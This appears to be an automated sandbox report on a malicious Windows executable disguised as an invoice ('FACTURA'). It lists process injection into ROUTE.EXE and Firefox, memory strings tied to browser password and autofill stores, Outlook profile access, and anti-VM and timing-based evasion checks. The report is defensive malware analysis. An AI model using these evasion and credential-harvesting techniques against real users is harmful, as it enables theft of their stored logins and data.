    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exe Code function: 0_2_004046DD GetDlgItem,SetWindowTextW,LdrInitializeThunk,LdrInitializeThunk,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,LdrInitializeThunk,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW, 0_2_004046DD
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exe Code function: 0_2_00402095 LdrInitializeThunk,CoCreateInstance,LdrInitializeThunk, 0_2_00402095
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\kolonibestyrernes
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exe File created: C:\Users\user\AppData\Local\Temp\nsr3F9D.tmp
    Source: FACTURA A-7507_H1758.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exe File read: C:\Users\desktop.ini
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
    Source: ROUTE.EXE, 00000004.00000002.30464673785.0000000007CB3000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE benefit_merchant_domains (benefit_id VARCHAR NOT NULL, merchant_domain VARCHAR NOT NULL)U;
    Source: ROUTE.EXE, 00000004.00000002.30460295215.0000000002F28000.00000004.00000020.00020000.00000000.sdmp, ROUTE.EXE, 00000004.00000003.26881340034.0000000002F48000.00000004.00000020.00020000.00000000.sdmp, ROUTE.EXE, 00000004.00000002.30460295215.0000000002F48000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
    Source: ROUTE.EXE, 00000004.00000003.26889367168.0000000007D0B000.00000004.00000020.00020000.00000000.sdmp, ROUTE.EXE, 00000004.00000002.30464673785.0000000007D17000.00000004.00000020.00020000.00000000.sdmp, E-1658-o.4.dr Binary or memory string: CREATE TABLE "autofill_profile_edge_extended" ( guid VARCHAR PRIMARY KEY, date_of_birth_day VARCHAR, date_of_birth_month VARCHAR, date_of_birth_year VARCHAR, source INTEGER NOT NULL DEFAULT 0, source_id VARCHAR)[;
    Source: FACTURA A-7507_H1758.exe ReversingLabs: Detection: 36%
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exe File read: C:\Users\user\Desktop\FACTURA A-7507_H1758.exe
    Source: unknown Process created: C:\Users\user\Desktop\FACTURA A-7507_H1758.exe "C:\Users\user\Desktop\FACTURA A-7507_H1758.exe"
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exe Process created: C:\Users\user\Desktop\FACTURA A-7507_H1758.exe "C:\Users\user\Desktop\FACTURA A-7507_H1758.exe"
    Source: C:\Program Files (x86)\KTovCZPwAEfLdyMaiKdNhYiGlitNomNEzhisVikkrg\vCWtwarpbXUl.exe Process created: C:\Windows\SysWOW64\ROUTE.EXE "C:\Windows\SysWOW64\ROUTE.EXE"
    Source: C:\Windows\SysWOW64\ROUTE.EXE Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exe Section loaded: edgegdi.dll, uxtheme.dll, userenv.dll, apphelp.dll, propsys.dll, dwmapi.dll, cryptbase.dll, oleacc.dll, version.dll, shfolder.dll, kernel.appcore.dll, windows.storage.dll, wldp.dll, riched20.dll, usp10.dll, msls31.dll, textinputframework.dll, coreuicomponents.dll, coremessaging.dll, ntmarta.dll, wintypes.dll, profapi.dll, msi.dll, iertutil.dll, sspicli.dll, powrprof.dll, winhttp.dll, wkscli.dll, netutils.dll, edgegdi.dll, umpdc.dll, msi.dll, wininet.dll, windows.storage.dll, wldp.dll, profapi.dll, kernel.appcore.dll, ondemandconnroutehelper.dll, mswsock.dll, iphlpapi.dll, winnsi.dll, urlmon.dll, srvcli.dll, dnsapi.dll, rasadhlp.dll, fwpuclnt.dll, schannel.dll, mskeyprotect.dll, ntasn1.dll, msasn1.dll, dpapi.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, gpapi.dll, ncrypt.dll, ncryptsslp.dll
    Source: C:\Windows\SysWOW64\ROUTE.EXE Section loaded: iphlpapi.dll, wininet.dll, edgegdi.dll, kernel.appcore.dll, uxtheme.dll, ieframe.dll, iertutil.dll, netapi32.dll, version.dll, userenv.dll, winhttp.dll, wkscli.dll, netutils.dll, sspicli.dll, windows.storage.dll, wldp.dll, profapi.dll, secur32.dll, mlang.dll, propsys.dll, winsqlite3.dll, vaultcli.dll, wintypes.dll, dpapi.dll, cryptbase.dll
    Source: C:\Program Files (x86)\KTovCZPwAEfLdyMaiKdNhYiGlitNomNEzhisVikkrg\vCWtwarpbXUl.exe Section loaded: wininet.dll, mswsock.dll, dnsapi.dll, iphlpapi.dll, fwpuclnt.dll, rasadhlp.dll
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
    Source: C:\Windows\SysWOW64\ROUTE.EXEKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
    Source: FACTURA A-7507_H1758.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
    Source: Binary string: route.pdb source: FACTURA A-7507_H1758.exe, 00000002.00000002.26711858259.0000000004F51000.00000004.00000020.00020000.00000000.sdmp, vCWtwarpbXUl.exe, 00000003.00000003.29557511884.0000000000EAB000.00000004.00000001.00020000.00000000.sdmp
    Source: Binary string: mshtml.pdb source: FACTURA A-7507_H1758.exe, 00000002.00000001.26330069368.0000000000649000.00000020.00000001.01000000.00000005.sdmp
    Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: vCWtwarpbXUl.exe, 00000003.00000002.30689807826.000000000077E000.00000002.00000001.01000000.00000008.sdmp, vCWtwarpbXUl.exe, 00000005.00000000.26765175851.000000000077E000.00000002.00000001.01000000.00000008.sdmp
    Source: Binary string: wntdll.pdbUGP source: FACTURA A-7507_H1758.exe, 00000002.00000003.26611799696.0000000035098000.00000004.00000020.00020000.00000000.sdmp, FACTURA A-7507_H1758.exe, 00000002.00000003.26615161368.000000003524F000.00000004.00000020.00020000.00000000.sdmp, FACTURA A-7507_H1758.exe, 00000002.00000002.26722750004.0000000035400000.00000040.00001000.00020000.00000000.sdmp, FACTURA A-7507_H1758.exe, 00000002.00000002.26722750004.000000003552D000.00000040.00001000.00020000.00000000.sdmp, ROUTE.EXE, 00000004.00000003.26700487716.00000000030CC000.00000004.00000020.00020000.00000000.sdmp, ROUTE.EXE, 00000004.00000003.26703715181.000000000327C000.00000004.00000020.00020000.00000000.sdmp, ROUTE.EXE, 00000004.00000002.30462678996.0000000003430000.00000040.00001000.00020000.00000000.sdmp, ROUTE.EXE, 00000004.00000002.30462678996.000000000355D000.00000040.00001000.00020000.00000000.sdmp
    Source: Binary string: wntdll.pdb source: FACTURA A-7507_H1758.exe, FACTURA A-7507_H1758.exe, 00000002.00000003.26611799696.0000000035098000.00000004.00000020.00020000.00000000.sdmp, FACTURA A-7507_H1758.exe, 00000002.00000003.26615161368.000000003524F000.00000004.00000020.00020000.00000000.sdmp, FACTURA A-7507_H1758.exe, 00000002.00000002.26722750004.0000000035400000.00000040.00001000.00020000.00000000.sdmp, FACTURA A-7507_H1758.exe, 00000002.00000002.26722750004.000000003552D000.00000040.00001000.00020000.00000000.sdmp, ROUTE.EXE, ROUTE.EXE, 00000004.00000003.26700487716.00000000030CC000.00000004.00000020.00020000.00000000.sdmp, ROUTE.EXE, 00000004.00000003.26703715181.000000000327C000.00000004.00000020.00020000.00000000.sdmp, ROUTE.EXE, 00000004.00000002.30462678996.0000000003430000.00000040.00001000.00020000.00000000.sdmp, ROUTE.EXE, 00000004.00000002.30462678996.000000000355D000.00000040.00001000.00020000.00000000.sdmp
    Source: Binary string: mshtml.pdbUGP source: FACTURA A-7507_H1758.exe, 00000002.00000001.26330069368.0000000000649000.00000020.00000001.01000000.00000005.sdmp
    Source: Binary string: route.pdbGCTL source: FACTURA A-7507_H1758.exe, 00000002.00000002.26711858259.0000000004F51000.00000004.00000020.00020000.00000000.sdmp, vCWtwarpbXUl.exe, 00000003.00000003.29557511884.0000000000EAB000.00000004.00000001.00020000.00000000.sdmp

    Data Obfuscation

    Source: Yara match, File source: 00000000.00000002.26333481443.00000000047A5000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exe, Code function: 0_2_10001B18 GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW, 0_2_10001B18
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exe, Code function: 0_2_10002DE0 push eax; ret 0_2_10002E0E
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exe, Code function: 2_2_354097A1 push es; iretd 2_2_354097A8
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exe, Code function: 2_2_354021AD pushad ; retf 0004h 2_2_3540223F
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exe, Code function: 2_2_354308CD push ecx; mov dword ptr [esp], ecx 2_2_354308D6
    Source: C:\Program Files (x86)\KTovCZPwAEfLdyMaiKdNhYiGlitNomNEzhisVikkrg\vCWtwarpbXUl.exe, Code function: 3_2_03A68196 push ebp; retf 3_2_03A681AB
    Source: C:\Program Files (x86)\KTovCZPwAEfLdyMaiKdNhYiGlitNomNEzhisVikkrg\vCWtwarpbXUl.exe, Code function: 3_2_03A5F1DA push A1F3ED28h; ret 3_2_03A5F1FE
    Source: C:\Program Files (x86)\KTovCZPwAEfLdyMaiKdNhYiGlitNomNEzhisVikkrg\vCWtwarpbXUl.exe, Code function: 3_2_03A61142 push edi; retf 3_2_03A6114B
    Source: C:\Program Files (x86)\KTovCZPwAEfLdyMaiKdNhYiGlitNomNEzhisVikkrg\vCWtwarpbXUl.exe, Code function: 3_2_03A568EA pusha ; iretd 3_2_03A568F4
    Source: C:\Program Files (x86)\KTovCZPwAEfLdyMaiKdNhYiGlitNomNEzhisVikkrg\vCWtwarpbXUl.exe, Code function: 3_2_03A5F80F push FFFFFFA1h; ret 3_2_03A5F811
    Source: C:\Program Files (x86)\KTovCZPwAEfLdyMaiKdNhYiGlitNomNEzhisVikkrg\vCWtwarpbXUl.exe, Code function: 3_2_03A616E8 push ds; iretd 3_2_03A616F2
    Source: C:\Program Files (x86)\KTovCZPwAEfLdyMaiKdNhYiGlitNomNEzhisVikkrg\vCWtwarpbXUl.exe, Code function: 3_2_03A6858F push E20CA858h; ret 3_2_03A68594
    Source: C:\Program Files (x86)\KTovCZPwAEfLdyMaiKdNhYiGlitNomNEzhisVikkrg\vCWtwarpbXUl.exe, Code function: 3_2_03A61C87 push esp; ret 3_2_03A61CA5
    Source: C:\Windows\SysWOW64\ROUTE.EXE, Code function: 4_2_034321AD pushad ; retf 0004h 4_2_0343223F
    Source: C:\Windows\SysWOW64\ROUTE.EXE, Code function: 4_2_034608CD push ecx; mov dword ptr [esp], ecx 4_2_034608D6
    Source: C:\Windows\SysWOW64\ROUTE.EXE, Code function: 4_2_034397A1 push es; iretd 4_2_034397A8
    Source: C:\Windows\SysWOW64\ROUTE.EXE, Code function: 4_2_0331C334 push ecx; retf 4_2_0331C33B
    Source: C:\Windows\SysWOW64\ROUTE.EXE, Code function: 4_2_0331639D push edi; retf 4_2_0331639E
    Source: C:\Windows\SysWOW64\ROUTE.EXE, Code function: 4_2_0331C23F push edx; retf 4_2_0331C240
    Source: C:\Windows\SysWOW64\ROUTE.EXE, Code function: 4_2_033252C2 push eax; ret 4_2_033252C4
    Source: C:\Windows\SysWOW64\ROUTE.EXE, Code function: 4_2_0331550E push edx; iretd 4_2_03315522
    Source: C:\Windows\SysWOW64\ROUTE.EXE, Code function: 4_2_033154ED push edx; iretd 4_2_03315522
    Source: C:\Windows\SysWOW64\ROUTE.EXE, Code function: 4_2_0331CB12 pushfd ; iretd 4_2_0331CB13
    Source: C:\Windows\SysWOW64\ROUTE.EXE, Code function: 4_2_0331FB7F push esp; iretd 4_2_0331FB80
    Source: C:\Windows\SysWOW64\ROUTE.EXE, Code function: 4_2_03315AA6 push FFFFFFE7h; iretd 4_2_03315AB3
    Source: C:\Windows\SysWOW64\ROUTE.EXE, Code function: 4_2_03315A8E push FFFFFFE7h; iretd 4_2_03315AB3
    Source: C:\Windows\SysWOW64\ROUTE.EXE, Code function: 4_2_0331F9F8 pushfd ; retf 4_2_0331FA0A
    Source: C:\Windows\SysWOW64\ROUTE.EXE, Code function: 4_2_0331FE95 push eax; iretd 4_2_0331FE96
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exe, File created: C:\Users\user\AppData\Local\Temp\nsrFDBF.tmp\System.dll
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exe, Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\ROUTE.EXE, Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

    Malware Analysis System Evasion

    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exe, API/Special instruction interceptor: Address: 50B4FC1
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exe, API/Special instruction interceptor: Address: 3424FC1
    Source: C:\Windows\SysWOW64\ROUTE.EXE, API/Special instruction interceptor: Address: 7FFEDBB8D144
    Source: C:\Windows\SysWOW64\ROUTE.EXE, API/Special instruction interceptor: Address: 7FFEDBB8D604
    Source: C:\Windows\SysWOW64\ROUTE.EXE, API/Special instruction interceptor: Address: 7FFEDBB8D764
    Source: C:\Windows\SysWOW64\ROUTE.EXE, API/Special instruction interceptor: Address: 7FFEDBB8D324
    Source: C:\Windows\SysWOW64\ROUTE.EXE, API/Special instruction interceptor: Address: 7FFEDBB8D364
    Source: C:\Windows\SysWOW64\ROUTE.EXE, API/Special instruction interceptor: Address: 7FFEDBB8D004
    Source: C:\Windows\SysWOW64\ROUTE.EXE, API/Special instruction interceptor: Address: 7FFEDBB8FF74
    Source: C:\Windows\SysWOW64\ROUTE.EXE, API/Special instruction interceptor: Address: 7FFEDBB8D864
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exe, File opened: C:\Program Files\Qemu-ga\qemu-ga.exe
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exe, File opened: C:\Program Files\qga\qga.exe
    Source: FACTURA A-7507_H1758.exe, 00000000.00000002.26331628112.00000000005F8000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE`
    Source: FACTURA A-7507_H1758.exe, 00000000.00000002.26331628112.0000000000636000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: \??\C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
    Source: FACTURA A-7507_H1758.exe, 00000000.00000002.26331091274.0000000000480000.00000004.00001000.00020000.00000000.sdmp, FACTURA A-7507_H1758.exe, 00000002.00000002.26712246825.00000000069C0000.00000004.00001000.00020000.00000000.sdmp, Binary or memory string: ,.C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exe, Code function: 2_2_35471763 rdtsc 2_2_35471763
    Source: C:\Windows\SysWOW64\ROUTE.EXE, Window / User API: threadDelayed 9812
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exe, Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsrFDBF.tmp\System.dll
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exe, API coverage: 0.2 %
    Source: C:\Windows\SysWOW64\ROUTE.EXE, API coverage: 1.8 %
    Source: C:\Windows\SysWOW64\ROUTE.EXE TID: 7780, Thread sleep count: 120 > 30
    Source: C:\Windows\SysWOW64\ROUTE.EXE TID: 7780, Thread sleep time: -240000s >= -30000s
    Source: C:\Windows\SysWOW64\ROUTE.EXE TID: 7780, Thread sleep count: 9812 > 30
    Source: C:\Windows\SysWOW64\ROUTE.EXE TID: 7780, Thread sleep time: -19624000s >= -30000s
    Source: C:\Program Files (x86)\KTovCZPwAEfLdyMaiKdNhYiGlitNomNEzhisVikkrg\vCWtwarpbXUl.exe TID: 5872, Thread sleep time: -30000s >= -30000s
    Source: C:\Windows\SysWOW64\ROUTE.EXE, Last function: Thread delayed
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exe, Code function: 0_2_0040596F CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 0_2_0040596F
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exe, Code function: 0_2_004064C1 FindFirstFileW,FindClose, 0_2_004064C1
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exe, Code function: 0_2_004027FB FindFirstFileW, 0_2_004027FB
    Source: FACTURA A-7507_H1758.exe, 00000000.00000002.26346049216.0000000010059000.00000004.00000800.00020000.00000000.sdmp, Binary or memory string: Hyper-V Guest Shutdown Service
    Source: FACTURA A-7507_H1758.exe, 00000000.00000002.26331091274.0000000000480000.00000004.00001000.00020000.00000000.sdmp, FACTURA A-7507_H1758.exe, 00000002.00000002.26712246825.00000000069C0000.00000004.00001000.00020000.00000000.sdmp, Binary or memory string: ,.C:\Program Files\Qemu-ga\qemu-ga.exe
    Source: vCWtwarpbXUl.exe, 00000005.00000002.30691049451.000000000115F000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllX
    Source: FACTURA A-7507_H1758.exe, 00000000.00000002.26346049216.0000000010059000.00000004.00000800.00020000.00000000.sdmp, Binary or memory string: Hyper-V Remote Desktop Virtualization Service
    Source: FACTURA A-7507_H1758.exe, 00000000.00000002.26346049216.0000000010059000.00000004.00000800.00020000.00000000.sdmp, Binary or memory string: vmicshutdown
    Source: FACTURA A-7507_H1758.exe, 00000000.00000002.26346049216.0000000010059000.00000004.00000800.00020000.00000000.sdmp, Binary or memory string: Hyper-V Volume Shadow Copy Requestor
    Source: FACTURA A-7507_H1758.exe, 00000000.00000002.26331628112.00000000005F8000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe`
    Source: ROUTE.EXE, 00000004.00000002.30460295215.0000000002ECE000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllo
    Source: FACTURA A-7507_H1758.exe, 00000000.00000002.26346049216.0000000010059000.00000004.00000800.00020000.00000000.sdmp, Binary or memory string: Hyper-V PowerShell Direct Service
    Source: FACTURA A-7507_H1758.exe, 00000000.00000002.26346049216.0000000010059000.00000004.00000800.00020000.00000000.sdmp, Binary or memory string: Hyper-V Time Synchronization Service
    Source: FACTURA A-7507_H1758.exe, 00000000.00000002.26346049216.0000000010059000.00000004.00000800.00020000.00000000.sdmp, Binary or memory string: vmicvss
    Source: FACTURA A-7507_H1758.exe, 00000002.00000003.26612530902.0000000004F38000.00000004.00000020.00020000.00000000.sdmp, FACTURA A-7507_H1758.exe, 00000002.00000002.26711728970.0000000004F38000.00000004.00000020.00020000.00000000.sdmp, FACTURA A-7507_H1758.exe, 00000002.00000002.26711441600.0000000004EF4000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: Hyper-V RAW
    Source: FACTURA A-7507_H1758.exe, 00000000.00000002.26346049216.0000000010059000.00000004.00000800.00020000.00000000.sdmp, Binary or memory string: Hyper-V Data Exchange Service
    Source: FACTURA A-7507_H1758.exe, 00000000.00000002.26346049216.0000000010059000.00000004.00000800.00020000.00000000.sdmp, Binary or memory string: Hyper-V Heartbeat Service
    Source: FACTURA A-7507_H1758.exe, 00000000.00000002.26331628112.0000000000636000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: \??\C:\Program Files\Qemu-ga\qemu-ga.exe
    Source: FACTURA A-7507_H1758.exe, 00000000.00000002.26346049216.0000000010059000.00000004.00000800.00020000.00000000.sdmp, Binary or memory string: Hyper-V Guest Service Interface
    Source: FACTURA A-7507_H1758.exe, 00000000.00000002.26346049216.0000000010059000.00000004.00000800.00020000.00000000.sdmp, Binary or memory string: vmicheartbeat
    Source: firefox.exe, 00000006.00000002.26994603056.0000024235097000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exe, API call chain: ExitProcess graph end node graph_0-4659
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exe, API call chain: ExitProcess graph end node graph_0-4652
    Source: C:\Windows\SysWOW64\ROUTE.EXE, Process information queried: ProcessInformation
    Source: C:\Windows\SysWOW64\ROUTE.EXE, Process queried: DebugPort
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exe, Code function: 2_2_35471763 rdtsc 2_2_35471763
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exe, Code function: 0_2_00402E41 GetTempPathW,GetTickCount,GetModuleFileNameW,GetFileSize,LdrInitializeThunk,GlobalAlloc,CreateFileW,LdrInitializeThunk, 0_2_00402E41
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exe, Code function: 0_2_10001B18 GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW, 0_2_10001B18
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exe, Code function: 2_2_3550B55F mov eax, dword ptr fs:[00000030h] 2_2_3550B55F
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_354EF7CF mov eax, dword ptr fs:[00000030h]2_2_354EF7CF
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_354337E4 mov eax, dword ptr fs:[00000030h]2_2_354337E4
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_354337E4 mov eax, dword ptr fs:[00000030h]2_2_354337E4
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_354337E4 mov eax, dword ptr fs:[00000030h]2_2_354337E4
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_354337E4 mov eax, dword ptr fs:[00000030h]2_2_354337E4
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_354337E4 mov eax, dword ptr fs:[00000030h]2_2_354337E4
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_354337E4 mov eax, dword ptr fs:[00000030h]2_2_354337E4
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_354337E4 mov eax, dword ptr fs:[00000030h]2_2_354337E4
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_354377F9 mov eax, dword ptr fs:[00000030h]2_2_354377F9
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_354377F9 mov eax, dword ptr fs:[00000030h]2_2_354377F9
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_35461796 mov eax, dword ptr fs:[00000030h]2_2_35461796
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_35461796 mov eax, dword ptr fs:[00000030h]2_2_35461796
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_3550B781 mov eax, dword ptr fs:[00000030h]2_2_3550B781
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_3550B781 mov eax, dword ptr fs:[00000030h]2_2_3550B781
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_354FD7A7 mov eax, dword ptr fs:[00000030h]2_2_354FD7A7
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_354FD7A7 mov eax, dword ptr fs:[00000030h]2_2_354FD7A7
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_354FD7A7 mov eax, dword ptr fs:[00000030h]2_2_354FD7A7
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_355017BC mov eax, dword ptr fs:[00000030h]2_2_355017BC
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_35433640 mov eax, dword ptr fs:[00000030h]2_2_35433640
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_3544F640 mov eax, dword ptr fs:[00000030h]2_2_3544F640
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_3544F640 mov eax, dword ptr fs:[00000030h]2_2_3544F640
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_3544F640 mov eax, dword ptr fs:[00000030h]2_2_3544F640
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_3542D64A mov eax, dword ptr fs:[00000030h]2_2_3542D64A
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_3542D64A mov eax, dword ptr fs:[00000030h]2_2_3542D64A
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_35465654 mov eax, dword ptr fs:[00000030h]2_2_35465654
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_3543965A mov eax, dword ptr fs:[00000030h]2_2_3543965A
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_3543965A mov eax, dword ptr fs:[00000030h]2_2_3543965A
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_35427662 mov eax, dword ptr fs:[00000030h]2_2_35427662
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_35427662 mov eax, dword ptr fs:[00000030h]2_2_35427662
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_35427662 mov eax, dword ptr fs:[00000030h]2_2_35427662
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_35443660 mov eax, dword ptr fs:[00000030h]2_2_35443660
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_35443660 mov eax, dword ptr fs:[00000030h]2_2_35443660
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_35443660 mov eax, dword ptr fs:[00000030h]2_2_35443660
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_354B166E mov eax, dword ptr fs:[00000030h]2_2_354B166E
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_354B166E mov eax, dword ptr fs:[00000030h]2_2_354B166E
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_354B166E mov eax, dword ptr fs:[00000030h]2_2_354B166E
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_354C5660 mov eax, dword ptr fs:[00000030h]2_2_354C5660
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_354C3608 mov eax, dword ptr fs:[00000030h]2_2_354C3608
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_354C3608 mov eax, dword ptr fs:[00000030h]2_2_354C3608
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_354C3608 mov eax, dword ptr fs:[00000030h]2_2_354C3608
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_354C3608 mov eax, dword ptr fs:[00000030h]2_2_354C3608
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_354C3608 mov eax, dword ptr fs:[00000030h]2_2_354C3608
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_354C3608 mov eax, dword ptr fs:[00000030h]2_2_354C3608
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_3545D600 mov eax, dword ptr fs:[00000030h]2_2_3545D600
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_3545D600 mov eax, dword ptr fs:[00000030h]2_2_3545D600
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_354B9603 mov eax, dword ptr fs:[00000030h]2_2_354B9603
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_354EF607 mov eax, dword ptr fs:[00000030h]2_2_354EF607
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_3546360F mov eax, dword ptr fs:[00000030h]2_2_3546360F
